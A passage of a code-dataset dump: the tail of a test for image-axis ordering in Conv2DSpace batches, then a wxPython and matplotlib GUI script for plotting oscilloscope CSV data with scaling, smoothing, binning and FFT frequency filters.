data_specs=(Conv2DSpace(shape=(48, 48),
num_channels=1,
axes=('c', 0, 1, 'b')),
'features'))
b01c_c01b = b01c_c01b_it.next()
assert np.all(b01c_c01b == c01b_c01b)
c01b_b01c_it = c01b_test.iterator(
mode='sequential',
batch_size=batch_size,
data_specs=(Conv2DSpace(shape=(48, 48),
num_channels=1,
axes=('b', 0, 1, 'c')),
'features'))
c01b_b01c = c01b_b01c_it.next()
assert np.all(c01b_b01c == b01c_b01c)
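# --- Illustrative sketch (not part of the original test module) ---
# The axis bookkeeping exercised above: a ('c', 0, 1, 'b') batch is dimshuffled
# back to ('b', 0, 1, 'c') with transpose(3, 1, 2, 0), i.e. batch first, channels last.
def _example_axis_roundtrip():
    c01b = np.zeros((1, 48, 48, 100))   # (channels, rows, cols, batch)
    b01c = c01b.transpose(3, 1, 2, 0)   # (batch, rows, cols, channels)
    assert b01c.shape == (100, 48, 48, 1)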
| bsd-3-clause | -6,576,612,867,599,089,000 | 37.49 | 74 | 0.522473 | false |
jameskeaveney/Python-GUI-Interactive-Plotter | interactive_plotter.py | 1 | 24753 | #!/usr/bin/env python
import matplotlib
matplotlib.use('WxAgg')
import pylab
pylab.ioff()
from matplotlib import rc
rc('text', usetex=False)
rc('font',**{'family':'serif'})
import wx, os, sys, csv
from numpy import arange,array,pi,zeros,append,std
from matplotlib.backends.backend_wxagg import FigureCanvasWxAgg, NavigationToolbar2WxAgg as Toolbar
#sys.path.append('/Users/xbnv46/Documents/Programming/IO')
#from smoothing import smoothTriangle as smooth
#from filters import *
#from databin import bin2 as bin
#filters
from scipy.fftpack import ifft, fft, fftfreq
from numpy import random
def Amp_dist(E,Ef):
	# first-order Butterworth-style amplitude response: 1/sqrt(1 + (E/Ef)^2)
	return ((1+(E/Ef)**2)**0.5)**(-1)
def lowpass(t,S,cutoff):
	# hard-edge low-pass: zero all Fourier components above the cutoff frequency
	tstep=t[1]-t[0]
	F = fft(S)
	freq = fftfreq(len(t),tstep)
	for i in range(len(freq)):
		if freq[i]<-cutoff or freq[i]>cutoff: F[i]=0.
	# the input signal is real, so keep only the real part of the inverse transform
	Sout = ifft(F).real
	return Sout
def better_lowpass(t,S,cutoff):
	# soft low-pass: weight each Fourier component by the Butterworth-style amplitude response
	tstep=t[1]-t[0]
	F = fft(S)
	freq = fftfreq(len(t),tstep)
	DD = Amp_dist(freq,cutoff)
	F = F * DD
	Sout = ifft(F).real
	return Sout
def highpass(t,S,cutoff):
	# hard-edge high-pass: zero all Fourier components below the cutoff frequency
	tstep=t[1]-t[0]
	F = fft(S)
	freq = fftfreq(len(t),tstep)
	for i in range(len(freq)):
		if freq[i]>-cutoff and freq[i]<cutoff: F[i]=0.
	Sout = ifft(F).real
	return Sout
def bandstop(t,S,lowcut,highcut):
	# hard-edge band-stop (notch): zero all Fourier components between lowcut and highcut
	tstep=t[1]-t[0]
	F = fft(S)
	freq = fftfreq(len(t),tstep)
	for i in range(len(freq)):
		if (freq[i]<-lowcut and freq[i]>-highcut) or (freq[i]>lowcut and freq[i]<highcut): F[i]=0.
	Sout = ifft(F).real
	return Sout
def bandpass(t,S,lowcut,highcut):
	# hard-edge band-pass: keep only the Fourier components between lowcut and highcut
	tstep=t[1]-t[0]
	F = fft(S)
	freq = fftfreq(len(t),tstep)
	for i in range(len(freq)):
		if (freq[i]>-lowcut and freq[i]<lowcut) or freq[i]>highcut or freq[i]<-highcut: F[i]=0.
	Sout = ifft(F).real
	return Sout
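# --- Illustrative sketch (not part of the original script) ---
# Shows the intended use of the FFT filters above: build a 50 Hz tone with added
# noise, then recover the tone with lowpass(). The sample rate and cutoff below
# are arbitrary illustration values, not anything prescribed by the script.
def _example_filter_demo():
	t = arange(0, 1, 1e-3)                     # 1 kHz sample rate, 1 s of data
	signal = pylab.sin(2 * pi * 50 * t)        # 50 Hz tone
	noisy = signal + 0.2 * random.randn(len(t))
	clean_signal = lowpass(t, noisy, 100.)     # keep everything below 100 Hz
	return clean_signal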
#Moving average smoothing
def smooth(data,degree,dropVals=False):
"""performs moving triangle smoothing with a variable degree."""
"""note that if dropVals is False, output length will be identical
to input length, but with copies of data at the flanking regions"""
triangle=array(range(degree)+[degree]+range(degree)[::-1])+1
smoothed=[]
for i in range(degree,len(data)-degree*2):
point=data[i:i+len(triangle)]*triangle
smoothed.append(sum(point)/sum(triangle))
if dropVals: return smoothed
smoothed=[smoothed[0]]*(degree+degree/2)+smoothed
j = len(data)-len(smoothed)
if j%2==1:
for i in range(0,(j-1)/2):
smoothed.append(data[-1-(j-1)/2+i])
smoothed.insert(0,data[(j-1)/2-i])
smoothed.append(data[-1])
else:
for i in range(0,j/2):
smoothed.append(data[-1-i])
smoothed.insert(0,data[i])
#print j,len(data),len(smoothed)
return array(smoothed)
#CSV reading
def read(filename,spacing=0,columns=2):
f=open(filename,'U')
fid=[]
for line in f:
fid.append(line)
f.close()
	# spacing: skip preamble lines if needed (e.g., on oscilloscope files);
	# -1: ignore the last (blank) line in the csv file (LeCroy)
	fid = fid[spacing:-1]
	inData=csv.reader(fid,delimiter=',')
	data=[]
for i in range(0,columns): data.append([])
for row in inData:
for i in range(0,columns):
data[i].append(float(row[i]))
for i in range(0,columns):
data[i] = array(data[i])
return data
#Data Binning
def bin(x,y,blength):
if blength % 2 == 0:
print '!!!!!!'
print 'CAUTION: bin length not an odd number. errors likely to occur!'
print '!!!!!!'
nobins = len(x)/blength
xmid = (blength-1)/2
xbinmax = nobins*blength - xmid
a=0
binned=zeros((nobins,3))
xout,yout,yerrout = array([]),array([]),array([])
for i in range(int(xmid),int(xbinmax),int(blength)):
xmin=i-int(xmid)
xmax=i+int(xmid)
xout=append(xout,sum(x[xmin:xmax+1])/blength)
yout=append(yout,sum(y[xmin:xmax+1])/blength)
yerrout=append(yerrout,std(y[xmin:xmax+1]))
return xout,yout,yerrout
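# --- Illustrative sketch (not part of the original script) ---
# bin() reduces an oversampled trace by averaging odd-length blocks and reports
# the spread of each block as an error bar; the values below are illustrative only.
def _example_bin_demo():
	x = arange(0, 99.)
	y = x ** 2
	xb, yb, yerr = bin(x, y, 11)  # 99 points -> 9 bins of 11 samples each
	return xb, yb, yerr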
class MainWin(wx.Frame):
def __init__(self,parent,title):
wx.Frame.__init__(self,None,title=title,size=(1200,600))
self.Bind(wx.EVT_CLOSE,self.OnExit)
### Statusbar at the bottom of the window
self.CreateStatusBar()
panel = wx.Panel(self)
### Text window (readonly) for outputting information (debug)
### Command line for custom commands on the fly
#cmdlbl = wx.StaticText(panel,label='Command-Line: ')
#cmd = wx.TextCtrl(panel,style=wx.TE_PROCESS_ENTER)
#self.Bind(wx.EVT_TEXT_ENTER,self.OnCommand,cmd)
# H sizer:
#cmline = wx.BoxSizer(wx.HORIZONTAL)
#cmline.Add(cmdlbl,0,wx.EXPAND)
#cmline.Add(cmd,1,wx.EXPAND)
#indents for sizers
Lindent = 60
Rindent = 80
### Signal processing: smoothing
SP_label = wx.StaticText(panel,label='Signal processing:',style=wx.ALIGN_CENTRE)
font = wx.Font(14,wx.DEFAULT, wx.NORMAL,wx.NORMAL)
SP_label.SetFont(font)
# H sizer:
SP_sizer = wx.BoxSizer(wx.HORIZONTAL)
SP_sizer.Add((Lindent-15,-1),0,wx.EXPAND)
SP_sizer.Add(SP_label,0,wx.EXPAND)
SP_sizer.Add((10,-1),1,wx.EXPAND)
#moving avg:
smth_label = wx.StaticText(panel,label='Moving average smoothing')
self.smooth_amount = 11
smth_amount_label = wx.StaticText(panel,label='Factor:')
smth_amount_box = wx.TextCtrl(panel,value='11',style=wx.TE_PROCESS_ENTER,size=(50,-1))
self.Bind(wx.EVT_TEXT,self.OnSmoothCtrl,smth_amount_box)
smth_button = wx.Button(panel,wx.ID_ANY,"Smooth data",size=(150,-1))
self.Bind(wx.EVT_BUTTON,self.OnSmoothBtn,smth_button)
#H sizer:
smth_sizer = wx.BoxSizer(wx.HORIZONTAL)
smth_sizer.Add((Lindent,-1),0,wx.EXPAND)
smth_sizer.Add(smth_label,0,wx.EXPAND)
smth_sizer.Add((10,-1),1,wx.EXPAND)
smth_sizer.Add(smth_amount_label,0,wx.EXPAND)
smth_sizer.Add(smth_amount_box,0,wx.EXPAND)
smth_sizer.Add((10,-1),0,wx.EXPAND)
smth_sizer.Add(smth_button,0,wx.EXPAND)
smth_sizer.Add((Rindent,-1),0,wx.EXPAND)
#binning:
self.bin_amount = 11
bin_label = wx.StaticText(panel,label='Data binning')
bin_label.SetToolTip(wx.ToolTip("Bin large arrays into smaller array, by the chosen factor"))
bin_amount_label = wx.StaticText(panel,label='Factor (Odd!):')
bin_amount_box = wx.TextCtrl(panel,value='11',style=wx.TE_PROCESS_ENTER,size=(50,-1))
self.Bind(wx.EVT_TEXT,self.OnBinCtrl,bin_amount_box)
bin_button = wx.Button(panel,wx.ID_ANY,"Bin data",size=(150,-1))
self.Bind(wx.EVT_BUTTON,self.OnBinBtn,bin_button)
bin_sizer = wx.BoxSizer(wx.HORIZONTAL)
bin_sizer.Add((Lindent,-1),0,wx.EXPAND)
bin_sizer.Add(bin_label,0,wx.EXPAND)
bin_sizer.Add((10,-1),1,wx.EXPAND)
bin_sizer.Add(bin_amount_label,0,wx.EXPAND)
bin_sizer.Add(bin_amount_box,0,wx.EXPAND)
bin_sizer.Add((10,-1),0,wx.EXPAND)
bin_sizer.Add(bin_button,0,wx.EXPAND)
bin_sizer.Add((Rindent,-1),0,wx.EXPAND)
#filtering:
Filter_label = wx.StaticText(panel,label='Frequency filters')
freq_select = [1e0,1e3,1e6,1e9]
freq_labels = ['Hz','kHz','MHz','GHz']
self.dd = dict(Hz=1.,kHz=1e3,MHz=1e6,GHz=1e9)
self.LPa = 1.
LP_amount_label = wx.StaticText(panel,label='Low frequency cutoff:')
LP_amount_box = wx.TextCtrl(panel,value='1',
style=wx.TE_PROCESS_ENTER)
self.Bind(wx.EVT_TEXT,self.OnLPCtrl,LP_amount_box)
self.LPm = 'kHz'
self.LP_amount = self.LPa * self.dd[self.LPm]
self.LPmult = wx.ComboBox(panel,value='kHz',
choices=freq_labels,style=wx.CB_READONLY)
self.Bind(wx.EVT_COMBOBOX,self.OnLPmult,self.LPmult)
self.HPa = 1.
HP_amount_label = wx.StaticText(panel,label='High frequency cutoff:')
HP_amount_box = wx.TextCtrl(panel,value='1',style=wx.TE_PROCESS_ENTER)
self.Bind(wx.EVT_TEXT,self.OnHPCtrl,HP_amount_box)
self.HPm = 'kHz'
self.HP_amount = self.HPa * self.dd[self.HPm]
self.HPmult = wx.ComboBox(panel,value='kHz',
choices=freq_labels,style=wx.CB_READONLY)
self.Bind(wx.EVT_COMBOBOX,self.OnHPmult,self.HPmult)
freq_tooltip = "Filter the y-axis (assuming x-axis is time) using hard-edge Fourier transform frequency filters"
for item in [HP_amount_label,LP_amount_label,
HP_amount_box,LP_amount_box,self.LPmult,
self.HPmult,Filter_label]:
item.SetToolTip(wx.ToolTip(freq_tooltip))
LP_button = wx.Button(panel,wx.ID_ANY,"Low-Pass",size=(150,-1))
self.Bind(wx.EVT_BUTTON,self.OnLPBtn,LP_button)
LP_button.SetToolTip(wx.ToolTip("Filter out high-frequency noise"))
HP_button = wx.Button(panel,wx.ID_ANY,"High-Pass",size=(150,-1))
self.Bind(wx.EVT_BUTTON,self.OnHPBtn,HP_button)
HP_button.SetToolTip(wx.ToolTip("Filter out low-frequency noise/offset"))
BP_button = wx.Button(panel,wx.ID_ANY,"Band-Pass",size=(150,-1))
self.Bind(wx.EVT_BUTTON,self.OnBPBtn,BP_button)
BP_button.SetToolTip(wx.ToolTip("Pass (retain) only the frequencies between low and high"))
BS_button = wx.Button(panel,wx.ID_ANY,"Band-Stop",size=(150,-1))
self.Bind(wx.EVT_BUTTON,self.OnBSBtn,BS_button)
BS_button.SetToolTip(wx.ToolTip("Block only the frequencies between low and high. Also commonly called a 'notch' filter"))
#filter sizer:
filter_sizerV = wx.BoxSizer(wx.VERTICAL)
t1_sizer = wx.BoxSizer(wx.HORIZONTAL)
t1_sizer.Add((Lindent,-1),0,wx.EXPAND)
t1_sizer.Add(Filter_label)
t1_sizer.Add((30,-1),1,wx.EXPAND)
t1_sizer.Add(LP_amount_label,0,wx.EXPAND)
t1_sizer.Add(LP_amount_box,0,wx.EXPAND)
t1_sizer.Add((10,-1),0,wx.EXPAND)
t1_sizer.Add(self.LPmult,0,wx.EXPAND)
t1_sizer.Add((Rindent,-1),0,wx.EXPAND)
t2_sizer = wx.BoxSizer(wx.HORIZONTAL)
t2_sizer.Add((Lindent,-1),0,wx.EXPAND)
t2_sizer.Add((10,-1),1,wx.EXPAND)
t2_sizer.Add((30,-1),1,wx.EXPAND)
t2_sizer.Add(HP_amount_label,0,wx.EXPAND)
t2_sizer.Add(HP_amount_box,0,wx.EXPAND)
t2_sizer.Add((10,-1),0,wx.EXPAND)
t2_sizer.Add(self.HPmult,0,wx.EXPAND)
t2_sizer.Add((Rindent,-1),0,wx.EXPAND)
t3_sizer = wx.BoxSizer(wx.HORIZONTAL)
t3_sizer.Add((Lindent,-1),1,wx.EXPAND)
t3_sizer.Add(LP_button,0,wx.EXPAND)
t3_sizer.Add((20,-1),0,wx.EXPAND)
t3_sizer.Add(HP_button,0,wx.EXPAND)
t3_sizer.Add((Rindent,-1),0,wx.EXPAND)
t4_sizer = wx.BoxSizer(wx.HORIZONTAL)
t4_sizer.Add((Lindent,-1),1,wx.EXPAND)
t4_sizer.Add(BP_button,0,wx.EXPAND)
t4_sizer.Add((20,-1),0,wx.EXPAND)
t4_sizer.Add(BS_button,0,wx.EXPAND)
t4_sizer.Add((Rindent,-1),0,wx.EXPAND)
filter_sizerV.Add(t1_sizer,0,wx.EXPAND)
filter_sizerV.Add((-1,5),0,wx.EXPAND)
filter_sizerV.Add(t2_sizer,0,wx.EXPAND)
filter_sizerV.Add((-1,5),0,wx.EXPAND)
filter_sizerV.Add(t3_sizer,0,wx.EXPAND)
filter_sizerV.Add((-1,5),0,wx.EXPAND)
filter_sizerV.Add(t4_sizer,0,wx.EXPAND)
filter_sizerH = wx.BoxSizer(wx.HORIZONTAL)
filter_sizerH.Add(filter_sizerV,1,wx.EXPAND)
#Plot panel - canvas and toolbar
self.fig = pylab.figure(1,(4.5/2,3./2),80)
self.ax = self.fig.add_subplot(111)
self.fig.subplots_adjust(bottom=0.16)
self.canvas = FigureCanvasWxAgg(panel, wx.ID_ANY, self.fig)
self.toolbar = Toolbar(self.canvas) #matplotlib toolbar
# V sizer:
plotpanel = wx.BoxSizer(wx.VERTICAL)
plotpanel.Add(self.canvas, 1, wx.LEFT|wx.RIGHT|wx.GROW,border=0)
plotpanel.Add(self.toolbar, 0, wx.LEFT|wx.RIGHT|wx.EXPAND,border=0)
#Buttons / button bar
btnsize=30
openrawfilebutton = wx.Button(panel,label="Open Raw File",size=(-1,btnsize))
self.Bind(wx.EVT_BUTTON,self.OnOpenRawFile,openrawfilebutton)
openrawfilebutton.SetToolTip(wx.ToolTip("Open a file from an oscilloscope, with some preamble at the start of the file (configured for LeCroy files)"))
openprocfilebutton = wx.Button(panel,label="Open Processed File",size=(-1,btnsize))
self.Bind(wx.EVT_BUTTON,self.OnOpenProcFile,openprocfilebutton)
openprocfilebutton.SetToolTip(wx.ToolTip("Open a csv file with two columns and no additional formatting"))
resetbutton = wx.Button(panel,wx.ID_ANY,'Revert',size=(-1,btnsize))
self.Bind(wx.EVT_BUTTON,self.OnReset,resetbutton)
resetbutton.SetToolTip(wx.ToolTip("Revert to originally loaded data set"))
exitbutton = wx.Button(panel,wx.ID_ANY,"Exit",size=(-1,btnsize))
self.Bind(wx.EVT_BUTTON,self.OnExit,exitbutton)
#Clear Figure, Axis Labels, Axis Text Size
PP_label = wx.StaticText(panel,label='Plot parameters:',style=wx.ALIGN_CENTRE)
font = wx.Font(14,wx.DEFAULT, wx.NORMAL,wx.NORMAL)
PP_label.SetFont(font)
# H sizer:
PP_sizer = wx.BoxSizer(wx.HORIZONTAL)
PP_sizer.Add((Lindent-15,-1),0,wx.EXPAND)
PP_sizer.Add(PP_label,0,wx.EXPAND)
PP_sizer.Add((10,-1),1,wx.EXPAND)
#initialise plot param values
self.xsize=18; self.ysize=18
self.xlabel=''; self.ylabel=''
self.holdgraph=False
self.ticklabelsize=13
#create list of strings to use as sizelist
sizelist = arange(8,33).tolist()
for i in range(0,len(sizelist)): sizelist[i]=str(sizelist[i])
#xlabels and sizes
xl = wx.StaticText(panel, label="X-Axis Label: ")
self.xlab = wx.TextCtrl(panel, value="")
xfsl = wx.StaticText(panel,label="Size: ")
self.xfs = wx.ComboBox(panel,value='18', choices=sizelist,style=wx.CB_READONLY)
self.Bind(wx.EVT_TEXT,self.xtext,self.xlab)
self.Bind(wx.EVT_CHAR,self.xchange,self.xlab)
self.Bind(wx.EVT_COMBOBOX,self.OnXfs,self.xfs)
#ylabels and sizes
yl = wx.StaticText(panel, label="Y-Axis Label: ")
self.ylab = wx.TextCtrl(panel, value="")
yfsl = wx.StaticText(panel,label="Size: ")
self.yfs = wx.ComboBox(panel,value='18', choices=sizelist,style=wx.CB_READONLY)
self.Bind(wx.EVT_TEXT,self.ytext,self.ylab)
self.Bind(wx.EVT_CHAR,self.ychange,self.ylab)
self.Bind(wx.EVT_COMBOBOX,self.OnYfs,self.yfs)
#put labels/sizes together in sizer
Labels = wx.BoxSizer(wx.VERTICAL)
L1 = wx.BoxSizer(wx.HORIZONTAL)
L1.Add((10,-1),1,wx.EXPAND)
L1.Add(xl,0,wx.EXPAND)
L1.Add(self.xlab,1,wx.EXPAND)
L1.Add((10,-1),0,wx.EXPAND)
L1.Add(xfsl,0,wx.EXPAND)
L1.Add(self.xfs,0,wx.EXPAND)
L1.Add((10,-1),1,wx.EXPAND)
L2 = wx.BoxSizer(wx.HORIZONTAL)
L2.Add((10,-1),1,wx.EXPAND)
L2.Add(yl,0,wx.EXPAND)
L2.Add(self.ylab,1,wx.EXPAND)
L2.Add((10,-1),0,wx.EXPAND)
L2.Add(yfsl,0,wx.EXPAND)
L2.Add(self.yfs,0,wx.EXPAND)
L2.Add((10,-1),1,wx.EXPAND)
Labels.Add(L1,0,wx.EXPAND)
Labels.Add((-1,5),0,wx.EXPAND)
Labels.Add(L2,0,wx.EXPAND)
# scales and normalise
XFactor_lbl = wx.StaticText(panel,label='X-axis scaling factor:')
YFactor_lbl = wx.StaticText(panel,label='Y-axis scaling factor:')
		# attribute names must match the ones used by XScaleCtrl/YScaleCtrl and OnXscale/OnNorm below
		self.Xscale = 1
		XScC = wx.TextCtrl(panel, value='1',size=(50,-1))
		self.Bind(wx.EVT_TEXT,self.XScaleCtrl,XScC)
		self.Yscale = 1
		YScC = wx.TextCtrl(panel, value='1',size=(50,-1))
		self.Bind(wx.EVT_TEXT,self.YScaleCtrl,YScC)
XSc = wx.Button(panel,label="Scale x-axis",size=(100,-1))
self.Bind(wx.EVT_BUTTON,self.OnXscale,XSc)
YSc = wx.Button(panel,label="Scale y-axis",size=(100,-1))
self.Bind(wx.EVT_BUTTON,self.OnYscale,YSc)
scale_sizer = wx.BoxSizer(wx.VERTICAL)
s1 = wx.BoxSizer(wx.HORIZONTAL)
s1.Add((10,-1),1,wx.EXPAND)
s1.Add(XFactor_lbl,0,wx.EXPAND)
s1.Add(XScC,0,wx.EXPAND)
s1.Add((10,-1),0,wx.EXPAND)
s1.Add(XSc,0,wx.EXPAND)
s1.Add((10,-1),1,wx.EXPAND)
s2 = wx.BoxSizer(wx.HORIZONTAL)
s2.Add((10,-1),1,wx.EXPAND)
s2.Add(YFactor_lbl,0,wx.EXPAND)
s2.Add(YScC,0,wx.EXPAND)
s2.Add((10,-1),0,wx.EXPAND)
s2.Add(YSc,0,wx.EXPAND)
s2.Add((10,-1),1,wx.EXPAND)
scale_sizer.Add(s1,0,wx.EXPAND)
scale_sizer.Add((-1,5),0,wx.EXPAND)
scale_sizer.Add(s2,0,wx.EXPAND)
#normalise
Norm_lbl = wx.StaticText(panel,label='Normalise by:')
normlist = ['Peak','Area']
self.NormType = wx.ComboBox(panel,value=normlist[0],
choices=normlist,style=wx.CB_READONLY)
NormBtn = wx.Button(panel,label='Normalise Y-data',size=(170,-1))
self.Bind(wx.EVT_BUTTON,self.OnNorm,NormBtn)
normTT = "Peak: normalise so that the peak value of the data is 1.\
Area: normalise so that the integrated area of the data is 1."
for item in [Norm_lbl,self.NormType,NormBtn]:
item.SetToolTip(wx.ToolTip(normTT))
norm_sizer = wx.BoxSizer(wx.HORIZONTAL)
norm_sizer.Add((10,-1),1,wx.EXPAND)
norm_sizer.Add(Norm_lbl,0,wx.EXPAND)
norm_sizer.Add((10,-1),0,wx.EXPAND)
norm_sizer.Add(self.NormType,0,wx.EXPAND)
norm_sizer.Add((10,-1),0,wx.EXPAND)
norm_sizer.Add(NormBtn,0,wx.EXPAND)
norm_sizer.Add((10,-1),1,wx.EXPAND)
#clear figure tickbox
OptionClear=wx.CheckBox(panel,label='Clear Figure on Update?')
self.Bind(wx.EVT_CHECKBOX,self.OnClear,OptionClear)
OptionClear.SetValue(True)
OptionClear.SetToolTip(wx.ToolTip("Like the holdoff command in MATLAB"))
#Log scale tickboxes
self.logX = False
self.logY = False
LogXTickBox = wx.CheckBox(panel,label='Logarithmic X-axis')
LogYTickBox = wx.CheckBox(panel,label='Logarithmic Y-axis')
self.Bind(wx.EVT_CHECKBOX,self.OnLogX,LogXTickBox)
self.Bind(wx.EVT_CHECKBOX,self.OnLogY,LogYTickBox)
log_sizer = wx.BoxSizer(wx.HORIZONTAL)
log_sizer.Add((10,-1),1,wx.EXPAND)
log_sizer.Add(LogXTickBox,0,wx.EXPAND)
log_sizer.Add((40,-1),0,wx.EXPAND)
log_sizer.Add(LogYTickBox,0,wx.EXPAND)
log_sizer.Add((10,-1),1,wx.EXPAND)
# open file / exit buttons
buttonbar = wx.BoxSizer(wx.HORIZONTAL)
buttonbar.Add((20,-1),0,wx.EXPAND)
buttonbar.Add(openprocfilebutton,0,
wx.RIGHT,border=15)
buttonbar.Add(openrawfilebutton,0,wx.RIGHT,border=20)
buttonbar.Add((10,-1),1,wx.EXPAND)
buttonbar.Add(resetbutton,0,wx.RIGHT,border=15)
buttonbar.Add(exitbutton,0,wx.RIGHT,border=20)
optionbar = wx.BoxSizer(wx.HORIZONTAL)
optionbar.Add((10,-1),1,wx.EXPAND)
optionbar.Add(OptionClear,0,wx.EXPAND|wx.LEFT|wx.RIGHT,border=20)
optionbar.Add((10,-1),1,wx.EXPAND)
#cmdline = wx.BoxSizer(wx.HORIZONTAL)
#cmdline.Add((10,-1),1,wx.EXPAND)
#cmdline.Add(cmline,1,wx.EXPAND|wx.LEFT|wx.RIGHT,border=20)
#cmdline.Add((10,-1),1,wx.EXPAND)
#### Main sizer::
left = wx.BoxSizer(wx.VERTICAL)
left.Add(plotpanel,1,wx.EXPAND,border=0)
right = wx.BoxSizer(wx.VERTICAL)
right.Add((-1,10),0,wx.EXPAND)
right.Add(PP_sizer,0,wx.EXPAND)
right.Add((-1,10))
right.Add(Labels,0,wx.EXPAND)
right.Add((-1,10))
right.Add(optionbar,0,wx.EXPAND)
right.Add((-1,10))
right.Add(scale_sizer,0,wx.EXPAND)
right.Add((-1,10))
right.Add(norm_sizer,0,wx.EXPAND)
right.Add((-1,10))
right.Add(log_sizer,0,wx.EXPAND)
right.Add((-1,25))
right.Add(SP_sizer,0,wx.EXPAND)
right.Add((-1,10))
right.Add(bin_sizer,0,wx.EXPAND)
right.Add((-1,10))
right.Add(smth_sizer,0,wx.EXPAND)
right.Add((-1,10))
right.Add(filter_sizerH,0,wx.EXPAND)
right.Add((-1,40),1,wx.EXPAND)
right.Add(buttonbar,0,wx.EXPAND)
finalsizer = wx.BoxSizer(wx.HORIZONTAL)
finalsizer.Add(left,1,wx.EXPAND)
finalsizer.Add(right,0,wx.EXPAND)
panel.SetSizer(finalsizer)
panel.Layout()
#
##
###################### Actions for events... #############################
##
#
def OnAbout(self,event):
dlg = wx.MessageDialog(self,'Plotting Program','What is this?',wx.OK)
dlg.ShowModal()
dlg.Destroy()
def OnReset(self,event):
self.x = self.xo
self.y = self.yo
self.ax.set_autoscale_on(True)
self.graph_update(self.x,self.y)
self.ax.set_autoscale_on(False)
def OnCommand(self,event):
try:
exec(event.GetString())
except:
print 'Not a valid command... \n'
self.canvas.draw()
def OnOpenRawFile(self,event):
self.dirname= ''
dlg = wx.FileDialog(self,"Choose Raw Scope CSV File...",self.dirname,"","*.csv",wx.OPEN)
#if ok button clicked, open and read file
if dlg.ShowModal() == wx.ID_OK:
self.filename = dlg.GetFilename()
self.dirname = dlg.GetDirectory()
#call read
spacing = 5
self.x,self.y = read(os.path.join(self.dirname,self.filename),spacing=spacing)
#record original
self.xo = self.x
self.yo = self.y
#plot
self.graph(self.x,self.y)
#self.layout()
dlg.Destroy()
def OnOpenProcFile(self,event):
self.dirname= ''
dlg = wx.FileDialog(self,"Choose 2-column csv file",self.dirname,"","*.csv",wx.OPEN)
#if ok button clicked, open and read file
if dlg.ShowModal() == wx.ID_OK:
self.filename = dlg.GetFilename()
self.dirname = dlg.GetDirectory()
#call read
self.x,self.y = read(os.path.join(self.dirname,self.filename),spacing=0)
#record original (for reset button)
self.xo = self.x
self.yo = self.y
#plot
self.graph(self.x,self.y)
#self.layout()
dlg.Destroy()
#tick boxes
def OnClear(self,event):
self.holdgraph= not(bool(event.Checked()))
print self.holdgraph
#plot graph, labels, sizes
def graph(self,x,y):
if not self.holdgraph:
pylab.cla()
self.ax.set_autoscale_on(True)
self.plotline, = self.ax.plot(array(x),y,lw=2.0)
self.canvas.draw()
def graph_update(self,x,y):
self.plotline.set_data(x,y)
self.canvas.draw()
def xtext(self,event):
self.xlabel=event.GetString()
self.ax.set_xlabel(self.xlabel,size=self.xsize)
self.canvas.draw()
def ytext(self,event):
self.ylabel=event.GetString()
self.ax.set_ylabel(self.ylabel,size=self.ysize)
self.canvas.draw()
def xchange(self,event):
self.xlabel=event.GetString()
self.ax.set_xlabel(self.xlabel,size=self.xsize)
self.canvas.draw()
def ychange(self,event):
self.ylabel=event.GetString()
self.ax.set_ylabel(self.ylabel,size=self.ysize)
self.canvas.draw()
def OnXfs(self,event):
self.xsize=int(event.GetString())
self.ax.set_xlabel(self.xlabel,size=self.xsize)
self.canvas.draw()
def OnYfs(self,event):
self.ysize=int(event.GetString())
self.ax.set_ylabel(self.ylabel,size=self.ysize)
self.canvas.draw()
#scales
	def XScaleCtrl(self,event):
		try:
			self.Xscale = float(event.GetString())
		except ValueError:
			pass  # ignore empty/partial input while typing
def OnXscale(self,event):
self.x = self.x * self.Xscale
self.graph_update(self.x,self.y)
self.ax.set_xlim(self.ax.get_xlim()[0]*self.Xscale,
self.ax.get_xlim()[1]*self.Xscale)
self.canvas.draw()
	def YScaleCtrl(self,event):
		try:
			self.Yscale = float(event.GetString())
		except ValueError:
			pass  # ignore empty/partial input while typing
def OnYscale(self,event):
self.y = self.y * self.Yscale
self.graph_update(self.x,self.y)
self.ax.set_ylim(self.ax.get_ylim()[0]*self.Yscale,
self.ax.get_ylim()[1]*self.Yscale)
self.canvas.draw()
#normalise
def OnNorm(self,event):
if self.NormType.GetValue()=='Area':
print 'area'
self.Yscale = 1./sum(self.y)
elif self.NormType.GetValue()=='Peak':
print 'peak'
self.Yscale = 1./self.y.max()
self.y = self.y * self.Yscale
self.graph_update(self.x,self.y)
self.ax.set_ylim(self.ax.get_ylim()[0]*self.Yscale,
self.ax.get_ylim()[1]*self.Yscale)
self.canvas.draw()
#log x/y axes
def OnLogX(self,event):
if bool(event.Checked()):
self.ax.set_xscale('log')
else:
self.ax.set_xscale('linear')
self.canvas.draw()
def OnLogY(self,event):
if bool(event.Checked()):
self.ax.set_yscale('log')
else:
self.ax.set_yscale('linear')
self.canvas.draw()
#exit button/menu item
def OnExit(self,event):
self.Destroy()
app.ExitMainLoop()
# Signal processing
def OnSmoothCtrl(self,event):
self.smooth_amount = int(event.GetString())
def OnSmoothBtn(self,event):
self.y = smooth(self.y,self.smooth_amount)
self.ax.set_autoscale_on(False)
self.graph_update(self.x,self.y)
def OnBinCtrl(self,event):
self.bin_amount = int(event.GetString())
def OnBinBtn(self,event):
self.x,self.y,ye = bin(self.x,self.y,self.bin_amount)
self.ax.set_autoscale_on(False)
self.graph_update(self.x,self.y)
def OnLPCtrl(self,event):
self.LPa = float(event.GetString())
self.LP_amount = self.LPa * self.dd[self.LPm]
print self.LP_amount
def OnHPCtrl(self,event):
self.HPa = float(event.GetString())
self.HP_amount = self.HPa * self.dd[self.HPm]
def OnLPmult(self,event):
self.LPm = self.LPmult.GetValue()
self.LP_amount = self.LPa * self.dd[self.LPm]
def OnHPmult(self,event):
self.HPm = self.HPmult.GetValue()
self.HP_amount = self.HPa * self.dd[self.HPm]
def OnLPBtn(self,event):
print 'Filter freq:',self.LP_amount
self.y = lowpass(self.x,self.y,self.LP_amount)
self.ax.set_autoscale_on(False)
self.graph_update(self.x,self.y)
def OnHPBtn(self,event):
self.y = highpass(self.x,self.y,self.HP_amount)
self.ax.set_autoscale_on(False)
self.graph_update(self.x,self.y)
def OnBPBtn(self,event):
self.y = bandpass(self.x,self.y,self.LP_amount,self.HP_amount)
self.ax.set_autoscale_on(False)
self.graph_update(self.x,self.y)
def OnBSBtn(self,event):
self.y = bandstop(self.x,self.y,self.LP_amount,self.HP_amount)
self.ax.set_autoscale_on(False)
self.graph_update(self.x,self.y)
###################
#redirect: error messages go to a pop-up box
app = wx.App(redirect=True)
frame = MainWin(None,"Interactive Plotter")
frame.Show()
app.MainLoop()
| mit | 22,884,526,365,834,650 | 29.979975 | 153 | 0.681412 | false |
